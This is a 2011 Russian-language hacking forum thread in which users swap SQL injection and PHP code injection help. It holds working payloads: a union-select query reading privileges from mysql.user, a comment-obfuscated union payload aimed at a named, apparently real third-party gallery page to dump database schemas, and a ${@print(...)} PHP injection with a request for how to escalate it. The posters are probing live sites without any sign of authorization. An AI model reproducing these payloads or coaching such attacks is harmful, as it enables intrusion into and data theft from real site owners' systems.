ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.11.2011, 06:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Было product.php?id=123{SQL} Значит стало:
123{SQL}.html
Abc-123{SQL}.html
123{SQL}-abc.html
|
|
|
|
30.11.2011, 14:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
1547
Репутация:
0
|
|
И еще извиняюсь за глупый вопрос, но как узнать file_priv и m.q , на форуме как то не нашел, а просматривать почти 2к страниц - смерть. И если узер sa значит ли это что file_priv Y ??
|
|
|
|
30.11.2011, 14:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Сообщение от h0w1tz3r
h0w1tz3r said:
И еще извиняюсь за глупый вопрос, но как узнать file_priv и m.q , на форуме как то не нашел, а просматривать почти 2к страниц - смерть. И если узер sa значит ли это что file_priv Y ??
union+select+1,file_priv,3+from+mysql.user+where+u ser=user()
|
|
|
|
30.11.2011, 14:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
1547
Репутация:
0
|
|
Сообщение от tabletkO
tabletkO said:
union+select+1,file_priv,3+from+mysql.user+where+u ser=user()
А если стоит mssql ? Там юнион не работает параметр.
|
|
|
|
30.11.2011, 17:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Is this site inject able?
http://www.martinzaple.co.uk/gallery.php?id=17
Nothing works on it.
|
|
|
|
30.11.2011, 17:52
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от lightangel
lightangel said:
Is this site inject able?
http://www.martinzaple.co.uk/gallery.php?id=17
Nothing works on it.
injectable
|
|
|
30.11.2011, 18:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от lightangel
lightangel said:
Is this site inject able?
http://www.martinzaple.co.uk/gallery.php?id=17
Nothing works on it.
http://www.martinzaple.co.uk/gallery.php?id=-7+/*!union*/+select+1,(select+schema_name+from+information_sch ema.schemata),3,4,5,6,7--+
there "union" filter
|
|
|
|
30.11.2011, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
771
Репутация:
0
|
|
Народ такой вопрос. Есть скуля msql 4.0.24-standart. Не выводит никак database().
делаю concat_ws(0x3a,user(),database(),version()) - вся информация есть кроме имени базы. Такое впечатление что для данного user() не в одну базу нет доступа? Линку скинуть пока не могу но хотелось бы разобраться почему такое получается? Может посоветуете чего? Заранее спасибо.
|
|
|
|
30.11.2011, 22:32
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от zenon3
zenon3 said:
Такое впечатление что для данного user() не в одну базу нет доступа?
практически невозможно,
лучше скинь в пм, посмотрю
|
|
|
|
01.12.2011, 02:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
4716
Репутация:
0
|
|
нашел php injection запрос вот такой
http://сайт/imp_sub.html?_c=${@print(md5(kasper))}&_m=publicat ions&_t=rec&id=1403
в ответ получаю
67cb7dbdb935430911459f5431d61701Method {${@print(md5(kasper))}} in class [$this->rec] does not exists!
Кто подскажет каким методом раскрутить?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
